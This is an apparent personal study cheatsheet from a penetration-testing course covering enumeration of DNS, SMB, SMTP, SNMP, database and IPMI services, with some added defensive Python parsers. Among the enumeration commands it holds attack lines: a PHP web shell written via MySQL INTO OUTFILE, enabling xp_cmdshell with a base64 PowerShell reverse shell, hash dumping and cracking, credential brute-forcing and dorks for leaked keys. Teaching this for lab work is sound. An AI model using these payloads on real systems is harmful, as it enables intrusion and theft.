Footprinting theory + cheatsheet

Footprinting common services

This post covers footprinting techniques from the CPTS course along with my cheatsheet for common enumeration methods.

Infrastructure Based Enumeration

Domain Information

Finding Valid Subdomains

openssl s_client -connect example.com:443 -showcerts

https://crt.sh/

crt.sh is a public search interface over Certificate Transparency logs. Searching for a domain lists every logged certificate issued for it, and the Subject Alternative Names on those certificates reveal associated subdomains.

View results in JSON

curl -s https://crt.sh/\?q\=example.com\&output\=json | jq .

Using Nmap and NSE to retrieve ssl information

nmap --script ssl-cert -p 443 example.com

Querying DNS records

dig any inlanefreight.com

DNS record types:

  1. A Record (Address Record) – Maps a domain name to an IPv4 address so computers know where to find a website.
  2. MX Record (Mail Exchange) – Specifies which mail servers handle email for a domain.
  3. NS Record (Name Server) – Points to the DNS servers responsible for managing a domain’s records.
  4. TXT Record (Text Record) – Stores extra information, often for verification (e.g., SPF for email security or site ownership proof).

Cloud Resources

Google dorks for finding Cloud resources

AWS S3 Buckets

site:s3.amazonaws.com "companyname"
inurl:".s3.amazonaws.com" filetype:xml

Azure Blob Storage

site:blob.core.windows.net "companyname"

Google Cloud Storage (GCS) Buckets

site:storage.googleapis.com "companyname"

Publicly Indexed Environment Files (May Contain Cloud Keys)

filetype:env "AWS_ACCESS_KEY_ID" OR "AZURE_STORAGE_KEY" OR "GOOGLE_CLOUD_PROJECT"

Exposed Log Files

filetype:log "password" OR "secret"

Third party tools for enumerating Cloud resources

https://domain.glass/

Domain.glass is a tool that aggregates DNS records and subdomains for a domain.

https://buckets.grayhatwarfare.com/

GrayHatWarfare is a search engine that indexes publicly exposed cloud storage buckets from AWS, Azure, and GCP. It can be used to find files left open to the internet.

Host Based Enumeration

FTP - File Transfer Protocol - Port 21

ftp <IP>

Enter anonymous when prompted for the username to log in anonymously (if anonymous login is enabled).

Recursive listing

ftp> ls -R

Download file

ftp> get <filename>

Upload file

ftp> put <filename>

Exit

ftp> exit

Download All Available Files

wget -m --no-passive ftp://username:password@<IP>

If the password has special characters (@, :, !, etc.), URL-encode them.

Use debug/trace for detailed output

Debug

ftp> debug

Trace

ftp> trace

Using nmap scripts

locate *.nse | grep ftp

Using these scripts

nmap --script "ftp-*" -p 21 <IP>

Interacting with FTP with TLS/SSL enabled

openssl s_client -connect 10.129.14.136:21 -starttls ftp

SMB - Server Message Block - Port 445 / 139

Enumerating shares

smbclient -N -L //<IP>

Connecting to share

smbclient //<IP>/<sharename>

list files

smb: \> ls

download file

smb: \> get <filename>

Using nmap scripts

locate *.nse | grep smb

Using these scripts

nmap --script "smb-*" -p 139,445 <IP>

Using rpcclient for enumeration. -U "" is for null authentication. Enter username if credentials are available.

rpcclient -U "" <IP>

RPCClient - Server Information

rpcclient $> srvinfo

RPCClient - Enumerate domains on the network

rpcclient $> enumdomains

RPCClient - Get domain, server and user information

rpcclient $> querydominfo

RPCClient - Enumerate all shares

rpcclient $> netshareenumall

RPCClient - Get information about a specific share

rpcclient $> netsharegetinfo <share>

RPCClient - Enumerate domain users

rpcclient $> enumdomusers

RPCClient - Query a specific user

rpcclient $> queryuser <RID>

RPCClient - Query a specific group

rpcclient $> querygroup <RID>

Brute Forcing User RIDs with script

for i in $(seq 500 1100);do rpcclient -N -U "" <IP> -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

Brute Forcing User RIDs with Impacket

samrdump.py <IP>

Enumeration with SMBmap

smbmap -H <IP>

Using Enum4Linux-ng

./enum4linux-ng.py <IP> -A

Using NetExec

Enumerating shares

nxc smb <IP> -u '' -p '' --shares

Enumerating users through RID Bruteforcing

nxc smb <IP> -u '' -p '' --rid-brute

Enumerating Password policy

nxc smb <IP> -u '' -p '' --pass-pol

Enumerating Local groups

nxc smb <IP> -u '' -p '' --local-group

NFS - Network File System - Port 111 / 2049

Using nmap scripts

locate *.nse | grep nfs

Using these scripts

sudo nmap --script nfs* <IP> -sV -p111,2049

Show available NFS Share

showmount -e <IP>

Mounting NFS Share

mkdir target-NFS
sudo mount -t nfs <IP>:/ ./target-NFS/ -o nolock
cd target-NFS

-o nolock is used to prevent issues with NFS file locking in certain environments.

List Contents with Usernames & Group Names

ls -l target-NFS/

List Contents with UIDs & GIDs

ls -n target-NFS/

Unmounting file share

cd ..
sudo umount ./target-NFS

DNS - Domain Name System - Port 53

Domain Name System (DNS) is responsible for mapping domain names to IP addresses. It consists of several server types:

Server Type                    Description
DNS Root Server                Handles top-level domains (TLDs); last-resort query resolution.
Authoritative Nameserver       Holds the official records for a specific domain.
Non-authoritative Nameserver   Caches DNS records from authoritative sources.
Caching DNS Server             Temporarily stores DNS query results.
Forwarding Server              Passes queries to another DNS server.
Resolver                       Resolves DNS queries locally (in routers, computers, etc.).

Common DNS Record Types

DNS Record   Description
A            Maps a domain to an IPv4 address.
AAAA         Maps a domain to an IPv6 address.
MX           Specifies mail servers for the domain.
NS           Identifies name servers for a domain.
TXT          Stores arbitrary text data (e.g., SPF, DKIM, DMARC validation).
CNAME        Creates an alias for another domain name.
PTR          Reverse lookup: maps an IP to a domain name.
SOA          Contains zone information and admin email.

DNS Enumeration Commands

Find Name Servers

dig ns <target-domain>
host -t ns <target-domain>

Retrieve All DNS Records

dig any <target-domain>
host -a <target-domain>

Enumerate a Specific Record Type

dig <record-type> <target-domain>
host -t <record-type> <target-domain>

Examples:

dig mx example.com    # Find mail servers
dig txt example.com   # Find TXT records
dig soa example.com   # Find SOA record

Reverse Lookup (PTR Record)

dig -x <IP>
host <IP>

Perform Zone Transfer (AXFR)

dig axfr <target-domain> @<dns-server>

Find Subdomains via Certificate Transparency Logs

curl -s "https://crt.sh/?q=<target-domain>&output=json" | jq .
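The crt.sh query above (and the same one in the Domain Information section) returns one JSON object per logged certificate, with all Subject Alternative Names of a certificate packed into the newline-separated name_value field and the same name repeated across every renewal. The script below is an added example, not part of the original post or of crt.sh, that reduces that reply to a unique host list and, as a defender's asset-inventory check, separates names that only ever appeared on certificates that have since expired: those are the stale entries worth checking for forgotten services or dangling DNS. The JSON sample is constructed in the shape crt.sh returns and contains no real certificates; the domain names and dates in it are assumptions.

```python
import json
from typing import Optional

# Constructed sample in the shape of crt.sh's ?q=<domain>&output=json reply;
# none of these certificates are real. name_value carries every SAN of one
# certificate, newline-separated, and the same name recurs across renewals.
SAMPLE_CRTSH_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "www.example.com",
     "name_value": "example.com\nwww.example.com",
     "not_before": "2024-01-01T00:00:00", "not_after": "2024-03-31T23:59:59"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "*.dev.example.com",
     "name_value": "*.dev.example.com\napi.dev.example.com",
     "not_before": "2024-02-01T00:00:00", "not_after": "2024-05-01T23:59:59"},
    {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "common_name": "mail.example.com",
     "name_value": "MAIL.example.com\nautodiscover.example.com.",
     "not_before": "2023-06-01T00:00:00", "not_after": "2024-06-01T23:59:59"},
    # Matches a loose search string but belongs to a different registrable domain.
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "example.com.evil.test",
     "name_value": "example.com.evil.test",
     "not_before": "2024-03-01T00:00:00", "not_after": "2024-05-30T23:59:59"},
])


def extract_subdomains(crtsh_json: str, domain: str, as_of: Optional[str] = None) -> dict:
    """Reduce crt.sh JSON to unique names under `domain`.

    Returns hosts (concrete FQDNs), wildcards (*.name entries, which prove a
    wildcard certificate exists but name no host) and only_on_expired_certs
    (hosts whose every certificate expired before `as_of`, an ISO timestamp).
    """
    domain = domain.lower().rstrip(".")
    suffix = "." + domain
    hosts, wildcards, current = set(), set(), set()
    for entry in json.loads(crtsh_json):
        # ISO-8601 timestamps compare correctly as plain strings.
        expired = as_of is not None and entry.get("not_after", "") < as_of
        for name in entry.get("name_value", "").split("\n"):
            name = name.strip().lower().rstrip(".")
            if not name or (name != domain and not name.endswith(suffix)):
                continue  # empty, or another registrable domain the search also matched
            if name.startswith("*."):
                wildcards.add(name)
                continue
            hosts.add(name)
            if not expired:
                current.add(name)
    return {
        "hosts": sorted(hosts),
        "wildcards": sorted(wildcards),
        "only_on_expired_certs": sorted(hosts - current),
    }


if __name__ == "__main__":
    # Replace SAMPLE_CRTSH_JSON with the real reply, e.g. sys.stdin.read() after
    # `curl -s "https://crt.sh/?q=<target-domain>&output=json"`.
    print(json.dumps(extract_subdomains(SAMPLE_CRTSH_JSON, "example.com",
                                        as_of="2024-04-15T00:00:00"), indent=2))
```

Names are lower-cased and trailing dots removed before de-duplication, because crt.sh returns SANs exactly as the CA logged them and the same host often appears in several spellings.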

Brute-Force Subdomains

Using SecLists:

for sub in $(cat /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt); do
  dig $sub.<target-domain> @<dns-server> | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt
done

Using dnsenum:

dnsenum --dnsserver <dns-server> --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt <target-domain>

DNS Enumeration with Nmap

Locate DNS NSE Scripts

locate *.nse | grep dns

Run DNS Enumeration Scripts

nmap --script "dns-*" -p 53 <target-domain>

SMTP - Simple Mail Transfer Protocol - Port 25 / 465 / 587

Understanding SMTP

Simple Mail Transfer Protocol (SMTP) is used for sending emails between clients and servers. It operates mainly on the following ports:

Port   Usage
25     Default SMTP port (often blocked for outbound mail).
465    Secure SMTP (SMTPS) using SSL/TLS encryption.
587    SMTP with STARTTLS (modern encryption standard).

SMTP is often used in combination with POP3 (Port 110) or IMAP (Port 143) to receive emails.

Common SMTP Commands

Command     Description
HELO/EHLO   Initiates a session with the SMTP server.
MAIL FROM   Specifies the sender's email address.
RCPT TO     Specifies the recipient's email address.
DATA        Signals the start of email body transmission.
VRFY        Checks if an email address exists (user enumeration).
EXPN        Expands a mailing list to show all recipients.
RSET        Aborts the current email transaction.
NOOP        Keeps the connection open without performing any action.
QUIT        Terminates the session.

Note: Many modern SMTP servers disable VRFY and EXPN due to security concerns. If disabled, consider alternative enumeration techniques (e.g., brute-force or metadata analysis).

SMTP Enumeration Commands

Banner Grabbing

nc -nv <IP> 25
telnet <IP> 25
  • Reveals the SMTP server version and potential misconfigurations.

Example Output:

220 mail.example.com ESMTP Postfix

Find Available SMTP Commands

ehlo example.com
  • Lists supported commands like VRFY, EXPN, STARTTLS, etc.

Enumerate Valid Users Using VRFY (If Allowed)

vrfy root
vrfy admin
vrfy user123
  • If the user exists, the server responds with a 252 2.0.0 reply.

Using EXPN (Expands Mailing Lists)

expn admin
expn users
expn mailinglist
  • May return a full list of emails if enabled.

Brute-Force User Enumeration with SMTP

for user in $(cat users.txt); do 
  echo "VRFY $user" | nc -nv <IP> 25;
done

Sending Emails via SMTP

Connect to SMTP Server

telnet <IP> 25

Start a Mail Session

HELO example.com
MAIL FROM: <attacker@example.com>
RCPT TO: <victim@example.com>
DATA

Write and Send Email

Subject: Test Email
This is a test email sent via SMTP enumeration.

.
QUIT
  • The . (dot) on a new line signifies the end of the message.

Checking for Open Relays (Misconfigurations)

An open relay allows anyone to send emails without authentication, often leading to spam and phishing attacks.

Test Open Relay with Telnet

MAIL FROM: <attacker@example.com>
RCPT TO: <victim@anydomain.com>
DATA
Subject: Open Relay Test
This is a test email.

.
QUIT
  • If accepted, the server is an open relay, allowing unauthorized emails.

Use Nmap to Check for Open Relay

nmap --script smtp-open-relay -p 25 <IP>

Example Output:

smtp-open-relay: Server is an open relay (16/16 tests)
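Both checks in this section, VRFY for user enumeration and the RCPT TO test for open relay, come down to one server-side decision each. The following is an added example, not code from the original post, nmap or any mail server: a constructed SMTP responder whose policy object models the two settings, with the permissive values reproducing the misconfigurations above and the hardened values what a production server should answer (VRFY disabled with 502, foreign recipients refused with 554 unless the session is authenticated). Reply codes follow RFC 5321; the wording, the local domain example.com and the user list are assumptions. The transcript it replays is the open-relay test from the section above.

```python
class SmtpPolicy:
    """Server-side knobs. Permissive values reproduce the misconfigurations the
    checks above look for; hardened values are what production should run."""

    def __init__(self, local_domains, allow_vrfy=True, relay_unauthenticated=True):
        self.local_domains = {d.lower() for d in local_domains}
        self.allow_vrfy = allow_vrfy
        self.relay_unauthenticated = relay_unauthenticated


def _address(line):
    """Pull user@domain out of 'MAIL FROM: <a@b>' / 'RCPT TO:a@b'."""
    return line.partition(":")[2].strip().strip("<>").strip().lower()


class SmtpSession:
    """Minimal constructed SMTP responder (reply codes per RFC 5321)."""

    def __init__(self, policy, known_users=("root", "postmaster"), authenticated=False):
        self.policy = policy
        self.known_users = set(known_users)  # assumed local mailboxes
        self.authenticated = authenticated
        self.sender, self.recipients, self.in_data = None, [], False

    def handle(self, line):
        """Return the reply to one client line, or None for message-body lines."""
        if self.in_data:
            if line == ".":
                self.in_data, self.sender, self.recipients = False, None, []
                return "250 2.0.0 Ok: queued"
            return None
        upper = line.upper()
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            return "250 mail.example.com"
        if verb == "VRFY":
            if not self.policy.allow_vrfy:
                return "502 5.5.1 VRFY command is disabled"
            user = arg.strip().strip("<>").partition("@")[0].lower()
            return f"252 2.0.0 {user}" if user in self.known_users else "550 5.1.1 User unknown"
        if upper.startswith("MAIL FROM:"):
            self.sender = _address(line)
            return "250 2.1.0 Ok"
        if upper.startswith("RCPT TO:"):
            if self.sender is None:
                return "503 5.5.1 Error: need MAIL command"
            rcpt = _address(line)
            rcpt_domain = rcpt.rpartition("@")[2]
            # The relay decision: deliver locally, relay for authenticated
            # clients, otherwise refuse unless the server is an open relay.
            if (rcpt_domain in self.policy.local_domains or self.authenticated
                    or self.policy.relay_unauthenticated):
                self.recipients.append(rcpt)
                return "250 2.1.5 Ok"
            return f"554 5.7.1 <{rcpt}>: Relay access denied"
        if verb == "DATA":
            if not self.recipients:
                return "503 5.5.1 Error: need RCPT command"
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "RSET":
            self.sender, self.recipients = None, []
            return "250 2.0.0 Ok"
        if verb == "NOOP":
            return "250 2.0.0 Ok"
        if verb == "QUIT":
            return "221 2.0.0 Bye"
        return "502 5.5.2 Error: command not recognized"


# The open-relay transcript from the section above, as a client would type it.
RELAY_TEST = ["HELO example.com", "MAIL FROM: <attacker@example.com>",
              "RCPT TO: <victim@anydomain.com>", "DATA", "Subject: Open Relay Test",
              "This is a test email.", "", ".", "QUIT"]


def run_transcript(policy, lines, authenticated=False):
    """Feed a transcript to a fresh session and collect the server replies."""
    session = SmtpSession(policy, authenticated=authenticated)
    return [reply for reply in (session.handle(l) for l in lines) if reply is not None]


def is_open_relay(policy):
    """True when an unauthenticated client gets a foreign recipient accepted."""
    return any(r.startswith("250 2.1.5") for r in run_transcript(policy, RELAY_TEST))


PERMISSIVE = SmtpPolicy(["example.com"], allow_vrfy=True, relay_unauthenticated=True)
HARDENED = SmtpPolicy(["example.com"], allow_vrfy=False, relay_unauthenticated=False)

if __name__ == "__main__":
    for name, policy in (("permissive", PERMISSIVE), ("hardened", HARDENED)):
        print(f"{name}: open relay = {is_open_relay(policy)}")
        print("  VRFY root ->", SmtpSession(policy).handle("VRFY root"))
```

The hardened policy still accepts RCPT TO for its own domain and still relays for an authenticated session, which is the distinction an open-relay scanner is probing for: the server should say 554 only for unauthenticated mail to a domain it is not responsible for.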

Locate SMTP NSE Scripts

locate *.nse | grep smtp

Run Common SMTP Enumeration Scripts

nmap --script "smtp-*" -p 25,465,587 <IP>

Using SMTP User Enum

smtp-user-enum -M VRFY -U users.txt -t <IP>

If VRFY is disabled, hydra can be used to brute-force credentials.

hydra -L users.txt -P passwords.txt -s 25 -S <IP> smtp

IMAP / POP3 - Internet Message Access Protocol - Post Office Protocol - Port 143 / 993 / 110 / 995

Understanding IMAP & POP3

IMAP (Internet Message Access Protocol) and POP3 (Post Office Protocol) are used to retrieve emails from a mail server.

Protocol              Port   Usage
IMAP                  143    Retrieves emails while keeping them on the server.
IMAPS (IMAP Secure)   993    IMAP over SSL/TLS encryption.
POP3                  110    Retrieves emails and removes them from the server.
POP3S (POP3 Secure)   995    POP3 over SSL/TLS encryption.

Common IMAP Commands

Command                          Description
1 LOGIN <username> <password>    Authenticates the user.
1 LIST "" *                      Lists all available mail directories.
1 CREATE "INBOX"                 Creates a new mailbox.
1 DELETE "INBOX"                 Deletes a mailbox.
1 SELECT INBOX                   Selects a mailbox for reading messages.
1 FETCH <ID> all                 Retrieves all data associated with an email message.
1 CLOSE                          Removes all messages marked as deleted.
1 LOGOUT                         Terminates the session with the IMAP server.

Common POP3 Commands

Command            Description
USER <username>    Identifies the user.
PASS <password>    Authenticates the user.
STAT               Displays the number of emails in the mailbox.
LIST               Lists all emails with their size.
RETR <ID>          Retrieves an email message by ID.
DELE <ID>          Deletes an email by ID.
RSET               Resets the mailbox state.
QUIT               Terminates the session with the POP3 server.

IMAP & POP3 Enumeration Commands

Scan for IMAP & POP3 Services

nmap -sV -p110,143,993,995 <IP>
  • Detects Dovecot, Exchange, or other mail services.
  • Shows SSL certificates and mail server details.

Extract IMAP/POP3 Capabilities

openssl s_client -connect <IP>:143 -starttls imap
openssl s_client -connect <IP>:110 -starttls pop3
  • Reveals supported authentication mechanisms.
  • Shows TLS/SSL configurations.

Brute-Force IMAP & POP3 Credentials Using hydra:

hydra -L users.txt -P passwords.txt imap://<IP> -V
hydra -L users.txt -P passwords.txt pop3://<IP> -V
  • Attempts to log in using username/password lists.

Access Mailbox with curl

curl -k 'imaps://<IP>' --user <user>:<password>

or

curl -k --url "imaps://<IP>/INBOX" --user <user>:<password>
  • Lists email folders upon successful authentication.

Enumerate Mailbox via IMAP

openssl s_client -connect <IP>:993

Then interact using:

1 LOGIN <user> <password>
1 LIST "" *
1 SELECT INBOX
1 FETCH 1 all
  • Fetches email messages and metadata.

Enumerate Mailbox via POP3

openssl s_client -connect <IP>:995

Then interact using:

USER <user>
PASS <password>
STAT
LIST
RETR 1
  • Retrieves email content from the server.

Using Nmap Scripts for IMAP and POP3

locate *.nse | grep imap
locate *.nse | grep pop3
nmap --script "imap-*" -p 143,993 <IP>
nmap --script "pop3-*" -p 110,995 <IP>

SNMP - Simple Network Management Protocol - Port 161 / 162

Understanding SNMP

Simple Network Management Protocol (SNMP) is used for monitoring and managing network devices like routers, switches, servers, and IoT devices.
It operates on:

  • UDP 161 for requests.
  • UDP 162 for receiving SNMP traps (unsolicited alerts from devices).

Discover SNMP Services

nmap -sU -p 161 --script=snmp-info <IP>

Extract SNMP System Information (Default Community Strings). Retrieves system info, usernames, installed software, and more.

snmpwalk -v2c -c public <IP>
snmpwalk -v1 -c public <IP>

Bruteforce Community Strings

onesixtyone -c /opt/useful/seclists/Discovery/SNMP/snmp.txt <IP>

Query a Specific OID

snmpget -v2c -c public <IP> .1.3.6.1.2.1.1.1.0

Enumerate SNMP Users (SNMPv3)

snmpwalk -v3 -u <username> -l authPriv -A <password> -X <encryption_key> -a SHA -x AES <IP>

Extract running processes (the OID below is hrSWRunName from the HOST-RESOURCES MIB); similar walks can dump installed software and local user accounts.

snmpwalk -v2c -c public <IP> .1.3.6.1.2.1.25.4.2.1.2

Brute-Force SNMP OIDs

braa public@<IP>:.1.3.6.*

Using Nmap scripts

locate *.nse | grep snmp
nmap --script "snmp-*" -p 161 <IP>
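A raw snmpwalk against a default community string is long and numeric, so the practical question for a defender auditing a device is what it actually hands out. The parser below is an added example, not part of the original post or of Net-SNMP: it reads the `iso.3.6.1... = TYPE: value` line format that snmpwalk prints without MIBs loaded, normalises OIDs to dotted-numeric form, and groups the well-known system fields plus the hrSWRunName (process) and hrSWInstalledName (package) tables into an inventory that can be compared against what the device should expose. The walk output is constructed sample data; the host name, process and package names in it are assumptions.

```python
import re

# Constructed snmpwalk output in Net-SNMP's numeric ("iso.") form, i.e. what
# `snmpwalk -v2c -c public <IP>` prints on a host without MIBs loaded.
SAMPLE_WALK = """\
iso.3.6.1.2.1.1.1.0 = STRING: "Linux fileserver01 5.15.0-generic #1 SMP x86_64"
iso.3.6.1.2.1.1.3.0 = Timeticks: (8855) 0:01:28.55
iso.3.6.1.2.1.1.5.0 = STRING: "fileserver01"
iso.3.6.1.2.1.1.6.0 = ""
iso.3.6.1.2.1.25.2.2.0 = INTEGER: 4096
iso.3.6.1.2.1.25.4.2.1.2.412 = STRING: "sshd"
iso.3.6.1.2.1.25.4.2.1.2.733 = STRING: "mysqld"
iso.3.6.1.2.1.25.4.2.1.2.901 = STRING: "smbd"
iso.3.6.1.2.1.25.6.3.1.2.1 = STRING: "openssh-server_1:8.9p1-3"
iso.3.6.1.2.1.25.6.3.1.2.2 = STRING: "samba_2:4.15.13"
"""

# oid = [TYPE:] value ; the type prefix is absent for empty strings ("").
LINE_RE = re.compile(r"^(?P<oid>(?:iso|\.1)[\d.]*)\s*=\s*(?:(?P<type>[A-Za-z-]+):\s*)?(?P<value>.*)$")

# Scalar objects from SNMPv2-MIB (system group).
NAMED_OIDS = {
    ".1.3.6.1.2.1.1.1.0": "sysDescr",
    ".1.3.6.1.2.1.1.5.0": "sysName",
    ".1.3.6.1.2.1.1.6.0": "sysLocation",
}
# Table columns from HOST-RESOURCES-MIB; the row index follows the prefix.
TABLE_PREFIXES = {
    ".1.3.6.1.2.1.25.4.2.1.2.": "processes",  # hrSWRunName: running process names
    ".1.3.6.1.2.1.25.6.3.1.2.": "installed",  # hrSWInstalledName: installed packages
}


def parse_snmpwalk(text):
    """Turn snmpwalk lines into (numeric OID, type, value) tuples."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # continuation line of a multi-line value; not an object
        oid = m.group("oid")
        if oid.startswith("iso"):
            oid = ".1" + oid[3:]  # "iso" is the textual name of top-level arc 1
        vtype = m.group("type") or ""
        value = m.group("value").strip()
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]  # STRING values are quoted; an empty one prints as ""
        records.append((oid, vtype, value))
    return records


def summarize(records):
    """Group a walk into what a read-only community string hands out."""
    summary = {"system": {}, "processes": [], "installed": []}
    for oid, _vtype, value in records:
        if oid in NAMED_OIDS:
            summary["system"][NAMED_OIDS[oid]] = value
        for prefix, bucket in TABLE_PREFIXES.items():
            if oid.startswith(prefix):
                summary[bucket].append(value)
    return summary


if __name__ == "__main__":
    # Replace SAMPLE_WALK with sys.stdin.read() to pipe real snmpwalk output in.
    print(summarize(parse_snmpwalk(SAMPLE_WALK)))
```

Row order in the tables is preserved, so the process list comes out in the order the agent walked it; anything that lands in the summary was readable with the community string used for the walk, which is the point to take to whoever owns the device.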

MySQL - Relational Database Management System - Port 3306

Using nmap scripts

sudo nmap <IP> -sV -sC -p3306 --script mysql*

Connect to mysql

mysql -u <Username> -p<Password> -h <IP>

See available databases

MySQL [(none)]> show databases;

See DB Version

MySQL [(none)]> select version();

Select database

MySQL [(none)]> use mysql;

Enumerate tables

MySQL [mysql]> show tables;

Show columns in a selected dataset

MySQL [mysql]> show columns from <table>;

Show all information in a table

MySQL [mysql]> select * from <table>;

Search for a specific string in a column of the desired table.

MySQL [mysql]> select * from <table> where <column> = "<string>";

Bruteforcing credentials with hydra

hydra -L users.txt -P passwords.txt -s 3306 -f <IP> mysql

If we have file write permissions, we can drop a PHP shell:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';

MSSQL - Microsoft SQL Server - Port 1433

Scanning for MSSQL Services

nmap -p 1433 --script ms-sql-* <IP>

If you have valid credentials, you can connect and enumerate the databases:

python3 mssqlclient.py <Username>:<password>@<IP>

List databases after connecting:

SQL> select name from sys.databases;

Check current user privileges:

SELECT IS_SRVROLEMEMBER('sysadmin');   -- 1 if the login is in the sysadmin server role
SELECT IS_MEMBER('db_owner');          -- 1 if the user owns the current database
SELECT IS_MEMBER('db_datareader');     -- 1 if the user can read all tables in the current database
SELECT IS_MEMBER('db_datawriter');     -- 1 if the user can modify data in the current database

If 1 is returned, you have the respective privilege; 0 means you are not a member, and NULL means the role name is not valid in that scope. IS_SRVROLEMEMBER only answers for server-level roles such as sysadmin; db_owner, db_datareader and db_datawriter are database roles and are checked with IS_MEMBER.

If xp_cmdshell is enabled, you can execute system commands:

EXEC xp_cmdshell 'whoami';

If xp_cmdshell is disabled, we can enable it:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Basic MSSQL Enumeration

List all databases

SELECT name FROM master.sys.databases;

Switch to a database

USE <database_name>;

List all tables in the current database

SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES;

List all columns in a specific table

SELECT COLUMN_NAME, DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'Users';

List all stored procedures

SELECT name FROM sys.procedures;

Check MSSQL version

SELECT @@VERSION;

Reverse Shell from xp_cmdshell

Get a Base64-encoded PowerShell payload from http://revshells.com/

EXEC xp_cmdshell 'powershell -enc BASE64_PAYLOAD';

Oracle TNS - Transparent Network Substrate - Port 1521

Scanning for Oracle TNS Services

nmap -p 1521 --script oracle-tns-version <IP>

Brute-force Oracle SIDs:

nmap --script oracle-sid-brute -p 1521 <IP>

Scan for known vulnerabilities:

nmap -p 1521 --script oracle-vuln-* <IP>

Oracle Enumeration with ODAT

ODAT (Oracle Database Attacking Tool) is useful for enumeration and exploitation.

git clone https://github.com/quentinhardy/odat.git
cd odat/
pip3 install -r requirements.txt

Check if the target is properly configured:

./odat.py all -s <IP>

Find valid credentials:

./odat.py passwordguesser -s <IP> -d XE -U users.txt -P passlist.txt

Brute-forcing Oracle Credentials

Using Hydra:

hydra -L users.txt -P passwords.txt <IP> oracle-listener

Connecting to Oracle Database

Using SQLPlus:

sqlplus <username>/<password>@<IP>/<SID>

Example:

sqlplus <USERNAME>/<PASSWORD>@<TARGET_IP>/<DATABASE_SID>

Connecting as SYSDBA:

sqlplus <USERNAME>/<PASSWORD>@<TARGET_IP>/<DATABASE_SID> as sysdba

Enumerate Database Information

List databases:

SELECT name FROM v$database;

List tables in current database:

SELECT table_name FROM all_tables;

List user privileges:

SELECT * FROM user_role_privs;

Extract password hashes:

SELECT name, password FROM sys.user$;

Exploiting Oracle Database

Uploading a File to the Server

Upload a test file:

echo "Test Upload" > test.txt
./odat.py utlfile -s <IP> -d XE -U <username> -P <password> --sysdba --putFile C:\\inetpub\\wwwroot test.txt ./test.txt

Check if file upload was successful:

curl -X GET http://<IP>/test.txt

IPMI - Intelligent Platform Management Interface - Port 623

Scanning for IPMI Services

nmap -sU -p 623 --script ipmi-* <IP>

Using Metasploit:

use auxiliary/scanner/ipmi/ipmi_version
set rhosts <IP>
run

Default Credentials to Try

Product            Username        Password
Dell iDRAC         root            calvin
HP iLO             Administrator   8-character random string
Supermicro IPMI    ADMIN           ADMIN

Bruteforce IPMI Credentials

hydra -L users.txt -P passwords.txt <IP> ipmi -V

Dumping IPMI Password Hashes

Using Metasploit:

use auxiliary/scanner/ipmi/ipmi_dumphashes
set rhosts <IP>
run

Cracking IPMI Hashes with Hashcat

hashcat -m 7300 ipmi_hashes.txt rockyou.txt --force

This is not complete yet. I plan to add more stuff about remote management protocols and a detailed explanation of things I haven't totally understood next week.